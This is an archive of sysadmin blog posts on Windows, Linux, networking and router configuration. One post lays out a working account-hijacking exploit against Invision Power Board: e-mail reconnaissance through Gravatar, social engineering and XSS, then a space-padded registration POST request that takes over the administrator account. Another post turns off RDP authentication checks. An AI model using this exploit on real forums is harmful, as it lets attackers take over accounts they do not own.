Tuesday, December 24, 2013

Windows Server 2012 R2 & HP Proliant Microserver

Windows Server 2012 R2 hangs on 'Getting devices ready 84%'
Fails to Complete the installation on HP MicroServer Gen7 (N36L, N40L & N54L)
The MicroServer N36, N40L and N54L all share the same embedded NC107i PCI Express gigabit NIC. The NC107i uses the Broadcom BCM5723 chip which doesn’t have an updated driver included with the Server 2012 R2 installation media. The lack of drivers will get you stuck at 84%...

The current workaround is to disable the on-board NIC and install another card:
  1. Flash the custom BIOS to unlock the hidden BIOS screens.
  2. Install a supported NIC in the PCIe slot (Joe used the Intel EXPI9301CTBLK).
  3. Go into the BIOS and change the settings to match:
     Boot Settings -> Embedded NIC Port 1 Control – [Disabled]
     Boot Settings -> Wake-On LAN – [Disabled]
     Chipset -> Atheros AR8132M NIC – [Disabled]
After a reboot, Server 2012 R2 should install fine.

Fall back to R1 or... here's a solution for you!

  1. Download this driver and add it to the $WinPEDriver$ folder of your media installation kit.
  2. Disable Embedded NIC Port 1 Control in the BIOS.
  3. Install Windows Server 2012 R2.
  4. Add a server name.
  5. Reboot into the BIOS to enable the NIC.
This should get you working, have fun!

HP have documented this as a known issue and are currently working with Microsoft to resolve prior to the official release of R2.

Thursday, December 12, 2013

Global Smartphone Sales

This Infographic is produced by Coupon Audit (provides Zappos coupon code) and VoovodeNET



Friday, December 6, 2013

ITProDevConnections 2013


It's time to attend a conference this weekend, all about technology, with my friend Nick.
I'll possibly stick to the networking & security area again, as every year...
Hope it's gonna be good! See you on Monday!

Thursday, December 5, 2013

Administer samba shares via SWAT

Is it hard for you to play with smb.conf and other stuff? Are you afraid of making mistakes?
Then you should think about using SWAT, the Samba Web Administration Tool.
We will first install samba, cifs-utils, swat and xinetd, all needed for our SWAT installation.
sudo apt-get install samba cifs-utils swat xinetd
Then we will go ahead and enable swat in our internet service daemon:
sudo update-inetd --enable 'swat'
sudo dpkg-reconfigure xinetd
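After xinetd, we will create the swat service:
# tee runs as root; with "sudo cat > file" the redirection is done by the unprivileged shell and fails
sudo tee /etc/xinetd.d/swat > /dev/null <<-EOF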
service swat
{
port = 901
socket_type = stream
wait = no
user = root
server = /usr/sbin/swat
log_on_failure += USERID
disable = no
}
EOF
SWAT needs to have access to the smb.conf file to edit it automatically. We will now give those permissions and restart the xinetd service:
sudo chmod g+w /etc/samba/smb.conf
sudo chgrp adm /etc/samba/smb.conf
sudo service xinetd restart
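By now you should be able to log in to the administration tool at http://localhost:901/. SWAT asks for a system account and sends it over plain HTTP, so keep port 901 reachable only from the machine itself or a trusted management network.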
Start sharing!

How to generate entropy in few easy steps

You will possibly need this for a PGP key. So how do you generate entropy through a secure shell connection in an easy way?
You don't have to smash the keyboard or move the mouse and stuff...

Install haveged, a simple entropy daemon.
apt-get install haveged
Then run it with -w and your number of bits:
haveged -w 4096
Now you can restart your PGP key entropy gatherer so that it finishes quickly. Right after it's done, you might consider removing haveged, as I did.
apt-get remove haveged
Easy eh?

Friday, November 29, 2013

Disable Automatic Private IP Addressing - APIPA

APIPA is sometimes tricky, giving us IPs in the range 169.254.0.1 to 169.254.255.254.
When a DHCP server fails, APIPA gives you an IP address. The client then verifies that its address is unique on the network by using ARP queries. Whenever a DHCP server sends the DHCPOffer packet, the client requests a DHCP lease, thus leaving APIPA addressing.

The best way to solve this is to head to the registry editor and change a DWORD value to zero:
HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters
IPAutoconfigurationEnabled: 0

Friday, November 15, 2013

Transmission daemon - 409: Conflict - Invalid session-id header


How to solve?
Remove the default /web from your URL:
http://www.example.com/transmission/web
to
http://www.example.com/transmission

Thursday, November 14, 2013

HRESULT 0xc8000222 when trying to install any version of .netFramework

This occurs mostly on Windows 7 and never happened on Windows 8: 'Installation Did Not Succeed' .NET Framework has not been installed because: HRESULT 0xc8000222
There is a common problem with Windows Update and the .NET Framework. We'll have to clean the SoftwareDistribution folder before we proceed.

Click Start and Run:
cmd
This will open the well known Command Prompt, then type:
net stop WuAuServ
This will stop the Windows Update service. Make sure you're the admin.
Click Start and Run again, this time type %windir% and press Enter.
Look for the SoftwareDistribution folder and rename it to SwDist.old.
Now go back to the Command Prompt and start the Windows Update.
net start WuAuServ
That was it. Re-run the .NET Framework installer and it should work.

Friday, November 8, 2013

Watch live tasks running on remote pc

This will work only if you have pstools installed on both computers.

@echo off
set /p comp=Type IP or HOSTNAME:
echo.
IF "%comp%"=="" GOTO Error
c:\pstools\pslist \\%comp% -s
echo.
pause
GOTO End
:Error
echo No IP inserted.
echo.
pause
:End
Save it as a batch file and run it.

Saturday, November 2, 2013

Image to disk and vice versa on unix


Back up all your USB drives or your disk drives, or clone them, using dd, the ultimate tool.
We will first list all our available disks, taking care not to make any mistake.
fdisk -l
Then, in the output, notice the /dev/sdA or /dev/hdA or /dev/sdB etc. Take note of which device you want to back up, then think about where the backup will go, such as a folder or another device.
if stands for input file.
of stands for output file.
By issuing the following command, we will back up our second drive into ~/.
dd if=/dev/sdb of=~/test.img
To restore it, simply swap /dev/sdb with ~/test.img, so simple!
You can also change the block size by using the bs option, e.g.:
dd if=/dev/sdb of=~/test.img bs=512

Saturday, October 19, 2013

Vodafone USB Broadband on Linux

What you will need:

  1. usb-modeswitch-2.0.1.tar.bz2
  2. usb_modeswitch-data
  3. libusb-1.x
Right after you install those on your Linux box, run these three commands in a terminal:
usb_modeswitch -WD -v 12d1 -p 1526 -n -M 555342437f0000000002000080000a11062000000000000100000000000000 -I -w 500
modprobe option
echo "12d1 14cf" > /sys/bus/usb-serial/drivers/option1/new_id
Open your network manager window, select Mobile Broadband, create a new connection and for connection settings leave them as default, just set the password to 1234.

Plug in your Vodafone USB and that's it!

Sunday, October 6, 2013

Disable ICMP ping responses on your Linux box

Depending on the distribution you use, you may be able to disable ping responses on your box to add some complexity for attackers, the 'bad guys'. In the video below I am going to show you how to apply such a configuration in your Linux distro.
Disable ping reply
echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all
Enable ping reply
echo 0 > /proc/sys/net/ipv4/icmp_echo_ignore_all
To make this permanent set the following into /etc/sysctl.conf
net.ipv4.icmp_echo_ignore_all = 1
ICMP Message Types
You can find more about ICMP here.


Saturday, October 5, 2013

Tips on hardening an enterprise server system

Hardening a system is the process of making it more secure than its default configuration; it is very important for servers. Some time ago, security wasn't a primary concern, but with all the viruses and attacks on servers today, administrators need to think about everything.

Keep the system updated

The risk of not being up to date is huge in the world we live in. Hundreds of vulnerabilities that you should be aware of are being discovered day by day by security experts. It doesn't matter if your anti-virus is special or your firewall is wicked sick; trust me, for a hacker it's not a big deal to write some bof and win.
Follow the updates regularly and don't miss a thing; patch every hole. In the Windows world you may use the WSUS feature on your server to serve updates to your network clients; this will save bandwidth on the network and save you from some unwanted patching.

Minimize the threat

A server should be installed only for its exact needs; if you're dealing with a server where you don't know what goes in and out, you're finished. Only the required services and protocols should be running; the rest should be disabled or removed. If you're working in a Windows environment, make sure to use Group Policy and the Security Configuration Wizard to help you.

  1. Use a DMZ: a demilitarized zone is a network placed in front of the internal 'protected' network for extra security.
  2. Use firewalls: play your game and create your own rules in order to win. Policy-based filtering, iptables etc.

This tool should help your windows computers.

Thursday, October 3, 2013

Enable TCP SYN cookie protection on your linux server

Normally, when a client attempts to start a TCP connection to a server, the client and server exchange a series of messages which runs like this:
  1. The client requests a connection by sending a SYN (synchronize) message to the server.
  2. The server acknowledges this request by sending SYN-ACK back to the client.
  3. The client responds with an ACK, and the connection is established.
This is called the TCP three-way handshake, and is the foundation for every connection established using the TCP protocol.
A SYN flood attack works by not responding to the server with the expected ACK. The malicious client can either simply not send the expected ACK, or spoof the source IP address in the SYN, causing the server to send the SYN-ACK to a falsified IP address, which will not send an ACK because it "knows" that it never sent a SYN.

The server will wait for the acknowledgement for some time, as simple network congestion could also be the cause of the missing ACK, but in an attack increasingly large numbers of half-open connections will bind resources on the server until no new connections can be made, resulting in a denial of service to legitimate traffic. Some systems may also malfunction badly or even crash if other operating system functions are starved of resources in this way.

The protection should be enabled by default in many distros.




Commands used:
sysctl -n net.ipv4.tcp_syncookies
nano /etc/sysctl.conf
sysctl -p
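
To see whether half-open connections are piling up, count sockets in SYN_RECV per remote address. The following is an added example, not part of the original post: it parses lines in the /proc/net/tcp format and interprets the value printed by sysctl -n net.ipv4.tcp_syncookies. The sample lines and the threshold are constructed, and the address decoding assumes a little-endian host such as x86.

```python
"""Count half-open (SYN_RECV) TCP connections from /proc/net/tcp-style lines."""
import socket
from collections import Counter

TCP_SYN_RECV = 0x03  # state code in the "st" column of /proc/net/tcp

# Meaning of net.ipv4.tcp_syncookies as documented for the Linux kernel.
SYNCOOKIE_MODES = {
    0: "disabled",
    1: "enabled: cookies are sent once the SYN backlog overflows",
    2: "unconditional: cookies are sent for every SYN",
}

# Constructed sample: a listener on port 80, one established session and four
# half-open connections from documentation addresses.
SAMPLE_PROC_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:0050 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 1001 1
   1: 0A0200C0:0050 076433C6:C350 03 00000000:00000000 01:00000064 00000001     0        0 0 1
   2: 0A0200C0:0050 076433C6:C351 03 00000000:00000000 01:00000064 00000001     0        0 0 1
   3: 0A0200C0:0050 076433C6:C352 03 00000000:00000000 01:00000064 00000002     0        0 0 1
   4: 0A0200C0:0050 097100CB:D431 03 00000000:00000000 01:00000064 00000001     0        0 0 1
   5: 0A0200C0:0050 0A6433C6:9C40 01 00000000:00000000 00:00000000 00000000    33        0 1002 1
"""


def decode_endpoint(field):
    """Turn '0A0200C0:0050' into ('192.0.2.10', 80) (IPv4, little-endian host)."""
    hex_ip, hex_port = field.split(":")
    ip = socket.inet_ntoa(bytes.fromhex(hex_ip)[::-1])
    return ip, int(hex_port, 16)


def half_open_by_source(lines):
    """Return a Counter {remote_ip: number of sockets in SYN_RECV}."""
    counts = Counter()
    for line in lines:
        fields = line.split()
        # Skip the header and anything that is not a socket row.
        if len(fields) < 4 or not fields[0].rstrip(":").isdigit():
            continue
        if int(fields[3], 16) != TCP_SYN_RECV:
            continue
        remote_ip, _port = decode_endpoint(fields[2])
        counts[remote_ip] += 1
    return counts


def suspicious_sources(counts, threshold):
    """Remote addresses holding at least `threshold` half-open connections.

    With spoofed sources the per-address counts stay low, so the total
    (sum(counts.values())) is worth watching as well.
    """
    return sorted(ip for ip, n in counts.items() if n >= threshold)


def syncookies_mode(value):
    """Describe the output of `sysctl -n net.ipv4.tcp_syncookies`."""
    return SYNCOOKIE_MODES.get(int(value.strip()), "unknown value")


if __name__ == "__main__":
    counts = half_open_by_source(SAMPLE_PROC_NET_TCP.splitlines())
    for ip, n in counts.most_common():
        print(f"{ip:15} {n} half-open")
    print("total half-open:", sum(counts.values()))
    print("over threshold:", suspicious_sources(counts, threshold=3))
    print("tcp_syncookies=1 ->", syncookies_mode("1"))
```

On a live server, feed it the lines of /proc/net/tcp instead of the sample.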


Friday, September 27, 2013

VLANs vs Subnetting

Subnet
A subnet is a range of IP addresses determined by part of an address (often called the network address) and a subnet mask (netmask). For example, if the netmask is 255.255.255.0 (or /24 for short), and the network address is 192.168.10.0, then that defines a range of IP addresses 192.168.10.0 through 192.168.10.255. Shorthand for writing that is 192.168.10.0/24; 255 is for the broadcast and 0 is for the network address.

VLAN
A good way to think of this is "switch partitioning." Let's say you have an 8 port switch that is VLAN-able. You can assign 4 ports to one VLAN (say VLAN 1) and 4 ports to another VLAN (say VLAN 2). VLAN 1 won't see any of VLAN 2's traffic and vice versa, logically, you now have two separate switches. Normally on a switch, if the switch hasn't seen a MAC address it will "flood" the traffic to all other ports. VLANs prevent this.




If two computers are going to talk using TCP/IP, then one of two conditions must be met:

  1. They must belong to the same subnet. This means the network address must be the same and the netmask must be equal or smaller. So, a computer with an interface with an IP address of 192.168.10.4/24 can talk to a computer with an interface with an IP address of 192.168.10.8/24 with no issues, provided they are both connected to the same physical switch or VLAN. If the second computer's interface connected to that same physical switch or VLAN was 192.168.11.8/24, it would ignore the traffic (unless the interface was in promiscuous mode).

  2. A router needs to exist between both computers that can forward traffic between subnets. Computer A and computer B need a route (or default gateway) to this router. Let's say a computer with an interface with an IP address of 192.168.10.4/24 wants to talk to a computer with an interface with an IP address of 192.168.20.4/24. Different subnets, so we must go through a router. Let's say there's a router with two interfaces (routers by definition have two interfaces), one on 192.168.10.254/24 and one on 192.168.20.254/24. If the route table or DHCP is set up correctly and both computer A and B can reach the router's interfaces on their respective subnets, then they can talk to each other indirectly via the router.

Forcing traffic to go through a router, even though it's not needed such as on our 8-port switch above, has security and performance benefits - it gives you an opportunity to filter traffic, an opportunity to optimally route traffic based on type, and routers do not forward broadcast traffic (unless unusually configured). VLANs are sometimes used as a "hack" to manage flows/visibility of IPv4 broadcast traffic.

VLANs are equivalent to switches. What comes in one port of a VLAN is replicated ("flooded") to all other ports unless the VLAN has seen/learned the MAC address before, in which case it is directed to that port. There is no gateway to the VLAN proper. A "gateway" always means the IP address of a router.

For VLAN 1 to talk to VLAN 2, an interface in VLAN 1 must be connected to a router, an interface in VLAN 2 must be connected to a router, and that router must be configured to forward traffic between those subnets. In our 8 port example above, if we wanted to route traffic between those VLANs, we'd have to spend 1 port on each VLAN connecting to a router. Same with a switch.
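
The two conditions above, worked through with the addresses used in this post. This is an added example, not part of the original text: the Port class, the router name "r1", the VLAN numbers and the single-hop routing model are assumptions made for the illustration, and hosts are assumed to have a route to the router.

```python
"""Decide how two IPv4 interfaces can talk: directly, via a router, or not at all."""
import ipaddress
from dataclasses import dataclass


@dataclass(frozen=True)
class Port:
    """One interface: address with prefix length, plus the VLAN it is plugged into."""
    addr: str
    vlan: int

    @property
    def iface(self):
        return ipaddress.ip_interface(self.addr)


def same_segment(a, b):
    """True when a and b can exchange frames directly.

    They must sit in the same VLAN (same layer-2 segment) and each address
    must fall inside the other's subnet.
    """
    return (
        a.vlan == b.vlan
        and b.iface.ip in a.iface.network
        and a.iface.ip in b.iface.network
    )


def path(src, dst, routers):
    """Return ('direct', None), ('routed', router_name) or ('unreachable', None).

    routers maps a name to the list of Ports that router owns. Only a single
    router hop is modelled.
    """
    if same_segment(src, dst):
        return ("direct", None)
    for name, ports in routers.items():
        near = any(same_segment(src, p) for p in ports)
        far = any(same_segment(dst, p) for p in ports)
        if near and far:
            return ("routed", name)
    return ("unreachable", None)


# The router from the text: one leg in each subnet, one switch port per VLAN.
ROUTERS = {
    "r1": [Port("192.168.10.254/24", vlan=1), Port("192.168.20.254/24", vlan=2)],
}

HOST_A = Port("192.168.10.4/24", vlan=1)

CASES = {
    "same subnet, same VLAN": Port("192.168.10.8/24", vlan=1),
    "other subnet, same VLAN": Port("192.168.11.8/24", vlan=1),
    "other subnet, other VLAN": Port("192.168.20.4/24", vlan=2),
    "same subnet, other VLAN": Port("192.168.10.8/24", vlan=2),
}

if __name__ == "__main__":
    for label, peer in CASES.items():
        print(f"{label:26} -> {path(HOST_A, peer, ROUTERS)}")
```

The last case is the one that tends to surprise: matching IP settings do not help when the VLANs differ, because no frame ever crosses from one VLAN to the other without a router leg in each.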

When a computer gets its IP via DHCP, it also usually gets the "default gateway" from that same DHCP server. Someone has to configure the DHCP server correctly. Routing protocols such as RIP, IS-IS, OSPF, and BGP can also add routes. Of course you have the option of adding static routes.

I'm sure many high-end switches/hardware have a "VLAN router" "built-in" to them where spending an extra port within each VLAN connecting it to a physical router really isn't necessary if you want to route between VLANs in the same switch. This might be where the VLAN IP or "gateway" comes into play.

Friday, August 2, 2013

mesa-libgl and nvidia-libgl are in conflict error




pacman -Syu

and..

mesa-libgl and nvidia-libgl are in conflict, Remove nvidia-libgl? [y/N]

The following commands will fix it quickly:
pacman -Syu --ignore mesa-libgl
pacman -Sc
pacman -Rs xf86-video-ati
pacman -Rs ati-dri
pacman -S nvidia
pacman -Syu
Basically you update while ignoring mesa-libgl, then purge the package cache, remove xf86-video-ati, which is 32-bit (maybe VMware needed it in the first place), and also ati-dri, then install the nvidia drivers and do a full update.

Monday, July 29, 2013

Cisco router - Reset config

Start PuTTY and connect to the communications port with the default rates etc.
Restart the Cisco router and break its boot sequence by tapping the Break key.
After you have broken the boot sequence, issue the following command:
confreg 0x2142
"You must reset or power cycle for new config to take effect" is what you will see after the proper usage of the above command. Reset by giving this:
reset
Now, after some time it should start booting. It will ask you if you'd like to start from scratch; say yes or no depending on what you actually want to configure.

[...] ~config taking place

After the configuration, you have to exit the NVRAM ignorance mode by issuing the commands below:
config-reg 0x2102
Exit config# using Ctrl+C and then:
wr mem
reload
Hint: If you would rather not reset the router's configuration, altering only the password is done the same way, but by answering no to the 'start from scratch' dialogue, then saving the running configuration by giving the copy start run command at that time. For more info reply below.

Installing a LAMP server

LAMP is a combination of free, open source software. The acronym LAMP refers to the first letters of Linux (operating system), Apache HTTP Server, MySQL (database software), and PHP, Perl or Python, principal components to build a viable general purpose web server.

Install Linux:
just kidding...
  1. Install Apache:
    sudo apt-get install apache2
    After everything is finished, fire up a browser and type:
    http://localhost/
    You should already see a folder; if nothing is found then you have to re-install it. If you still can't find a solution, drop a line below.
  2. Install PHP:
    sudo apt-get install php5 libapache2-mod-php5
    After everything is finished, we have to restart Apache so that it picks up PHP:
    sudo /etc/init.d/apache2 restart
  3. Install MySQL:
    sudo apt-get install mysql-server
    Then get access to the console by typing:
    mysql -u root
    And change your password:
    mysql> SET PASSWORD FOR 'root'@'localhost' = PASSWORD('P@$sw0rd');
    After that, install PHPMyAdmin:
    sudo apt-get install libapache2-mod-auth-mysql php5-mysql phpmyadmin
    Edit php.ini to work with phpmyadmin...
    gksudo gedit /etc/php5/apache2/php.ini
    And change this line:
    ;extension=mysql.so to extension=mysql.so
    The last thing is to restart Apache so that it takes care of MySQL too:
    sudo /etc/init.d/apache2 restart
    Go to http://localhost again and check what you've done!

Friday, July 19, 2013

RDC authentication bypass

This is not a hack.
  1. Open up a command prompt and type mstsc.exe.
  2. Click on Options drop down menu to access advanced options about the connection.
  3. Save the connection settings by clicking Save As..., somewhere in your desktop.
  4. Right click this .rdp file now and open it using Notepad.
  5. Find authentication level:i:2 and turn it into authentication level:i:0.
  6. Add enablecredsspsupport:i:0 at the end of the text file.
  7. Then, open the rdp file which we've just edited and connect to the remote computer.
  8. If it asks you for a password, enter the password of your local user account.
done!


Sunday, July 14, 2013

Reduce MTU size to accept 802.1Q or ISL

Inter-Switch Link (ISL) and 802.1Q are two different protocols for trunks between network devices, though they cause some problems when they are not configured properly...

In order not to cause frame errors, so that packets can be accepted on the RX line, you have to reduce the MTU size if you are working with cheap equipment or non-Cisco devices.

I won't explain the 'how-to' because devices vary; just a reminder :)

Wednesday, July 3, 2013

Icon not displayed correctly? Rebuild the icon cache.



This will work for Windows Vista, 7 or 8.




This is the default location of the icon cache database:
C:\Users\User-Name\AppData\Local\IconCache.db

Fire up cmd as an Administrator and give the following commands in turn:
ie4uinit.exe -ClearIconCache
taskkill /IM explorer.exe /F
DEL "%localappdata%\IconCache.db" /A
shutdown /r /f /t 00
This will force the IconCache.db to rebuild. 

Tuesday, July 2, 2013

Export - Import a DHCP database on a Windows Server



Moving to another server? Backing up a windows server? Here you go:


1. netsh dhcp server export c:\dhcpbackup.txt all

2. Do not create a new scope in the dialogue; we're restoring a backup, remember?

3. After you disable your old DHCP server:

4. netsh dhcp server import c:\dhcpbackup.txt all

Problems found:
If you get "An Internal Error Occurred", then delete the following entries inside the txt file before restoring:

006 DNS Server
015 DNS Domain Name

Thursday, June 13, 2013

Control a windows service remotely

Too much getting up and moving around a networking environment to control services on different Windows machines? This post will show you how to control a service remotely.
First, let's find out the name of the service we're trying to control:
sc.exe \\HOSTNAME query
sc.exe is a service control application included in Windows that can control services on a remote computer.
The previous command queries the computer HOSTNAME to show all of its available services and their statuses.

Now, it's time to control the service:
sc.exe \\HOSTNAME stop "NAMEOFSERVICE"

The full list of control commands is available via "sc.exe /?"

Monday, May 20, 2013

NSS Labs tested 5 top browsers vs malware

As the first line of defense against malware infection, browsers must provide a strong layer of protection. NSS tested the effectiveness of five leading web browsers against 754 samples of real-world malicious software, and the results show significantly differing protection capabilities.


Source

Wednesday, May 15, 2013

Unable to connect to network - Rebuild the TCP/IP stack

There's a bug where you connect to a network but no packets are sent, nothing is happening, you haven't got an IP address and nothing seems to be working... is the NIC broken? See below how to fully reset the TCP/IP stack in order to get things working again:

  1. Go into Safe Mode with Networking.
  2. Delete these keys from regedit:
     HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Winsock
     HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Winsock2
  3. Open the nettcpip.inf file in your %winroot%\inf folder
     (%winroot% is usually c:\windows).
  4. Find the [MS_TCPIP.PrimaryInstall] section. Change the Characteristics value from 0xA0 to 0x80.
  5. Open the properties of the network connection you want to fix. In the General tab, click on the Install button. Click on the Have Disk button, and point the location to %winroot%\inf. After that select TCP/IPv4.
  6. Now you are able to uninstall TCP/IP; do it and reboot.
  7. Go back to your network connection, install TCP/IP again and reboot; things must be working now.
  8. Open cmd and type the last thing, the reset with its txt log:
     netsh int ip reset resetlog.txt

Are you connected now? :)


Tuesday, May 14, 2013

IPB all versions - administrator account hijacking


Invision Power Board (abbreviated IPB, IP.Board or IP Board) is an Internet forum software produced by Invision Power Services, Inc. It is written in PHP and primarily uses MySQL as a database management system, although support for other database engines is available. While Invision Power Board is a commercially sold product, there is a large modding community and many of these modifications are free. In addition, many groups offer the download or design of free and paid skins.
  • Required data:
        1) Administrator's login name
The admin login is easily found by clicking on "The moderating Team" link on recent IPB's footer, or using the URL below: index.php?app=forums&module=extras&section=stats&do=leaders

        2) Administrator's e-mail
Obtaining the admin e-mail may be more complicated as there is no automated way to get it. The attacker can get it through:
     - using whois on domain.tld to get registrar information
     - looking up a prospective e-mail on Facebook and see if a matching profile shows up
     - using Gravatar (Gravatar is a personal avatar you can find on most blogs, forum, etc comments based on user e-mail address). Attacker can create a script to retrieve an email based on an avatar. For example mine is: http://www.john-jean.com/gravapwnd.php?zboob=john@wargan.com
     - do sourcing using FB, G+, Twitter, Google SERP, ...
     - use SE methods, such as faked e-mail catcher; or use XSSs on known websites consulted by the target.

  • Exploitation:

Previously, on this advisory: we saw that $email is not rejected if it contains spurious whitespace, and that the length of $member_key & $v is not checked. We also saw some MySQL use cases. Let's see how we can exploit that:

The e-mail field from the `members` table in IPB is declared as a varchar(150).
Upon registration, we fill in the e-mail of the member (or admin) whose account we want to steal, to which we add space padding so that the size of the string exceeds 150. Then we add any character after the padding. It is necessary to bypass the AJAX validator; feel free to use Burp Suite or Tamperdata.

For example:
Real administrator's email: 'admin@admin.com'
Attacker's mail fill: 'admin@admin.com                                                                                                                                       AAAA'

The SELECT query checking existing e-mails will not yield any result:
SELECT * FROM members WHERE email='admin@admin.com                                                                                                                                       AAAA'

The new account is successfully created. Our account is now using the e-mail address below:
'admin@admin.com                                                                                                                                       '
AAAA has been deleted by MySQL: strings exceeding 150 characters are truncated.

At this stage, we have two users with very similar e-mail addresses:
Administrator is: 'admin@admin.com'
Attacker is: 'admin@admin.com                                                                                                                                       '

POST HTTP request looks like (on registration page):

************************ BEGIN OF CODE ************************
POST /~codereview/IPB/index.php?app=core&module=global&section=register HTTP/1.1
Host: gfy.wargan.com
User-Agent: Wargan/1.0 (WarganOS; Amstrad; rv:1.0)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://gfx.wargan.com/~codereview/IPB/index.php?app=core&module=global&section=register
Cookie: session_id=00000000000; member_id=2; pass_hash=000000000000; ipsconnect_0000000000=1; coppa=0; rteStatus=rte
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 466

termsread=1&agree_to_terms=1&do=process_form&coppa_user=0&nexus_pass=1&time_offset=1&dst=1&members_display_name=pentest&EmailAddress=pentest%40wargan.com            A&PassWord=pentest&PassWord_Check=pentest&recaptcha_challenge_field=03AHJ_VuvGN728OMAVD0UvgLdylK1KAt8WH0N2aezZZpZfluTG8wJmfSyhiKM0zYb7io5sk62SQ9fQ2Y1XKqPOmEG0hW9DrThpXgEh-DU73qdpZ_OPxkO_v1xg2k1dJSOCk0wZcxufezfezefezFM0LSCwjJn7bbJJMk&recaptcha_response_field=mmotlyiinducted&agree_tos=1
************************* END OF CODE ***************************

We can now change our password. The profile corresponding to our session's e-mail will be used. As already stated, spaces are not taken into consideration. The query will thus actually return the first matching e-mail result: the real administrator account. We will have actually changed the password of the administrator profile.

This flaw is usable both on the registration page and on the user control panel (index.php?app=core&module=usercp&tab=core&area=email).
Have fun :)
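
For anyone maintaining code with the same pattern, the collision and the input check that stops it can be reproduced without a database. This is an added example, not code from the advisory or from IPB: the MemberTable class and the function names are hypothetical, the padded input is constructed after the advisory's example, and the two MySQL behaviours it models are truncation to the column length in non-strict mode and comparisons that ignore trailing spaces.

```python
"""Model of the e-mail collision described above and a check that prevents it."""
import re

EMAIL_COLUMN_LEN = 150  # members.email is varchar(150) according to the advisory
ADMIN_EMAIL = "admin@admin.com"
# Constructed input: the admin address, space padding past 150 chars, then "AAAA".
PADDED_INPUT = ADMIN_EMAIL + " " * 140 + "AAAA"


def mysql_store(value, max_len=EMAIL_COLUMN_LEN):
    """What a non-strict MySQL keeps on INSERT: the value cut to the column length."""
    return value[:max_len]


def mysql_equal(a, b):
    """String equality under a PAD SPACE collation: trailing spaces are ignored."""
    return a.rstrip(" ") == b.rstrip(" ")


class MemberTable:
    """Tiny stand-in for the members table (hypothetical, not IPB code)."""

    def __init__(self):
        self.rows = []  # each row: {"name": ..., "email": ...}

    def find_by_email(self, email):
        return [r for r in self.rows if mysql_equal(r["email"], email)]

    def insert(self, name, email):
        self.rows.append({"name": name, "email": mysql_store(email)})


def register_unchecked(table, name, email):
    """Registration that only asks the database whether the raw input exists."""
    if table.find_by_email(email):
        return False
    table.insert(name, email)
    return True


_EMAIL_RE = re.compile(r"[^@\s]+@[^@\s]+\.[^@\s]+")


def normalize_email(email, max_len=EMAIL_COLUMN_LEN):
    """Return the address to store, or raise ValueError.

    Rejects anything the column would silently alter: lengths above the
    column size and whitespace anywhere in the value.
    """
    if len(email) > max_len:
        raise ValueError("e-mail longer than the column")
    if not _EMAIL_RE.fullmatch(email):
        raise ValueError("e-mail contains whitespace or is malformed")
    return email.lower()


def register_checked(table, name, email):
    """Validate first, then run the uniqueness check on the value that is stored."""
    try:
        email = normalize_email(email)
    except ValueError:
        return False
    return register_unchecked(table, name, email)


def demo():
    """Run both registrations against a table that already holds the admin."""
    legacy = MemberTable()
    legacy.insert("admin", ADMIN_EMAIL)
    accepted = register_unchecked(legacy, "pentest", PADDED_INPUT)
    owners = [r["name"] for r in legacy.find_by_email(ADMIN_EMAIL)]

    fixed = MemberTable()
    fixed.insert("admin", ADMIN_EMAIL)
    blocked = not register_checked(fixed, "pentest", PADDED_INPUT)
    return accepted, owners, blocked


if __name__ == "__main__":
    accepted, owners, blocked = demo()
    print("unchecked registration accepted:", accepted)
    print("accounts matching the admin address afterwards:", owners)
    print("checked registration blocked:", blocked)
```

A UNIQUE index on the e-mail column and strict SQL mode are the database-side counterparts of this check.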

How-to remotely enable RDC in a LAN

Are you a network administrator who'd like to sit in his chair a bit longer without having to move around the place? How about working remotely without effort? Heh, enable Remote Desktop in this LAN easily:
  1. Log into a windows machine as an Administrator and start Registry Editor.
  2. Click on File menu and choose Connect to Network Registry.
  3. Type the host name of the remote computer or browse computers over the network by clicking “Advanced” button, then click ok.
  4. Find HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server.
  5. Find fDenyTSConnections: 1 = disabled, 0 = enabled, choose wisely :)
  6. You have turned RDP on in the remote machine.
There's also another, faster method:
reg add "\\COMPUTERNAME\hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0
Replace COMPUTERNAME with the target network computer, hf.

Saturday, April 27, 2013

Mikrotik DynDNS configuration how-to

,

Mikrotik is so powerful, but unfortunately it doesn't support dynamic DNS service without using a script...
I had to create a completely new config a few days ago, so I was searching for the DDNS option but couldn't find a thing.

So, after asking our dear friend Google, there seems to be a script to get around this limit:




# Set needed variables
:local username "yourusername"
:local password "yourpassword"
:local hostname "yourdyndnsorgname.dyndns.org"
:global systemname [/system identity get name]

:if ($systemname = "Site1" ) do= {
:set hostname "yourdomain1.dyndns.org"
}
:if ($systemname = "Site2" ) do= {
:set hostname "yourdomain2.dyndns.org"
}
:if ($systemname = "Site3" ) do= {
:set hostname "yourdomain3.dyndns.org"
}

:global dyndnsForce
:global previousIP

# print some debug info (the password is not written to the log, which other users and remote syslog targets can read)
:log info ("UpdateDynDNS: username = $username")
:log info ("UpdateDynDNS: hostname = $hostname")
:log info ("UpdateDynDNS: previousIP = $previousIP")

# get the current IP address from the internet (in case of double-nat)
/tool fetch mode=http address="checkip.dyndns.org" src-path="/" dst-path="/dyndns.checkip.html"
:local result [/file get dyndns.checkip.html contents]

# parse the current IP result
:local resultLen [:len $result]
:local startLoc [:find $result ": " -1]
:set startLoc ($startLoc + 2)
# the address ends at the closing </body> tag of the reply
:local endLoc [:find $result "</body>" -1]
:local currentIP [:pick $result $startLoc $endLoc]
:log info "UpdateDynDNS: currentIP = $currentIP"

# Remove the # on next line to force an update every single time - useful for debugging,
# but you could end up getting blacklisted by DynDNS!

#:set dyndnsForce true

# Determine if dyndns update is needed
# more dyndns updater request details available at http://www.dyndns.com/developers/specs/syntax.html
:if (($currentIP != $previousIP) || ($dyndnsForce = true)) do={
:set dyndnsForce false
:set previousIP $currentIP
